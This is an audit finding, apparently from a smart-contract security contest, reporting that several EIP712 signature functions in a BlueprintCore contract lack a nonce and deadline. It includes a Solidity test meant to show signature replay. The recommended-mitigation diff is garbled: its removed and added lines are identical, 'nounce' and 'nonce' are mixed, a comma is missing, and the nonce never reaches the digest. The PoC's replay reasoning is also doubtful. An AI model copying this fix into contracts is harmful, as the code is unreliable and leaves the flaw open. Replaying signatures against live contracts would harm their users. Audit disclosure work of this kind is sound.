Great Ruby Woodpecker

High

# Lack of nonce and deadline in multiple function that uses EIP712 may cause replay attack.

**Description:** 
one of The core functionality of the project is to support gasless implemetation using EIP712 in the `BlueprintCore` contract. the `BlueprintCore` contract use this implementation in the  `createProjectIDAndProposalRequestWithSig`, `createProjectIDAndDeploymentRequestWithSig`, `createAgentWithTokenWithSig`, `createAgentWithWhitelistUsersWithSig`, `createAgentWithSigWithNFT`, `updateWorkerDeploymentConfigWithSig` functions. but they all lack nonce and expiring deadline(timestamp). This could allows an attacker to capture a valid signature and replay it multiple times, potentially causing unexpected behavior or loss of funds.
https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L491C14-L491C41

**Impact:** attacker can replay signatures to create unlimited agents, exhausting user token allowances or disrupting protocol operations.

**Proof of Concept:**
i picked the ` createAgentWithTokenWithSig` function as a POC example, we could use a different one too.
paste this in the `BlueprintV5.t.sol` test contract:
```solidity
function test_createAgentReplayAttack3() public {
        string memory base64Proposal = "test base64 proposal";
        string memory serverURL = "http://example.com";
    
        // Generate the signature
        (bytes memory signature, address signerAddress) = generateSignature(projectId, base64Proposal, serverURL);
    
        // Add the payment address and set costs
        blueprint.addPaymentAddress(address(mockToken));
        blueprint.setCreateAgentTokenCost(address(mockToken), 0);
        //blueprint.setFeeCollectionWalletAddress(address(this));
    
        // Give tokens to the signer
        deal(address(mockToken), signerAddress, 1000);
        vm.prank(signerAddress);
        mockToken.approve(address(blueprint), type(uint256).max);
    
        // First transaction (legitimate)
        vm.prank(makeAddr("bigtomony"));
        bytes32 requestID1 = blueprint.createAgentWithTokenWithSig(
            projectId, base64Proposal, workerAddress, serverURL, address(mockToken), signature
        );
        
        // Here's where the replay attack happens - attacker creates a totally different project
        bytes32 differentProjectId = bytes32(uint256(projectId) + 1);
        
        vm.prank(makeAddr("attacker"));
        bytes32 requestID2 = blueprint.createAgentWithTokenWithSig(
            differentProjectId, base64Proposal, workerAddress, serverURL, address(mockToken), signature
        );
        
        //the second call succeeded using the same signature
        bytes32 thirdProjectId = bytes32(uint256(projectId) + 2);
        
        vm.prank(makeAddr("anotherAttacker"));
        blueprint.createAgentWithTokenWithSig(
            thirdProjectId, base64Proposal, workerAddress, serverURL, address(mockToken), signature
        );
    }
```

**Recommended Mitigation:** 
1. add a mapping in the `BlueprintCore.sol` to store different nonce and address as it's key.
2. update the `getRequestDeploymentDigest` param to take the ` uint nonce `
3. set the EIP712 compatible functions to take nonce.
```diff
-   function getRequestDeploymentDigest(bytes32 projectId, string memory base64RecParam, string memory serverURL)
+   function getRequestDeploymentDigest(bytes32 projectId, string memory base64RecParam, string memory      serverURL, uint nonce)
        public
        view
        returns (bytes32)
    {
        bytes32 structHash = keccak256(
            abi.encode(
-                nounce, DEPLOYMENT_REQUEST_TYPEHASH, projectId, keccak256(bytes(base64RecParam)), keccak256(bytes(serverURL))
+                nounce, DEPLOYMENT_REQUEST_TYPEHASH, projectId, keccak256(bytes(base64RecParam)), keccak256(bytes(serverURL))
            )
        );

        return _hashTypedDataV4(structHash);
    }
    ///// BlueprintCore contract /////


+        mapping(address => uint256) public nonces;

         function createAgentWithTokenWithSig(
+       uint nounce     
        bytes32 projectId,
        string memory base64Proposal,
        address privateWorkerAddress,
        string memory serverURL,
        address tokenAddress,
        bytes memory signature
    ) public returns (bytes32 requestID) {
        require(tokenAddress != address(0), "Token address is empty");

        // get EIP712 hash digest
        bytes32 digest = getRequestDeploymentDigest(projectId, base64Proposal, serverURL);

        // get signer address
        address signerAddr = getSignerAddress(digest, signature);
+        require(nonce == nonces[signerAddr], "Invalid nonce");
+       nonces[signerAddr]++;
//.....
    }
```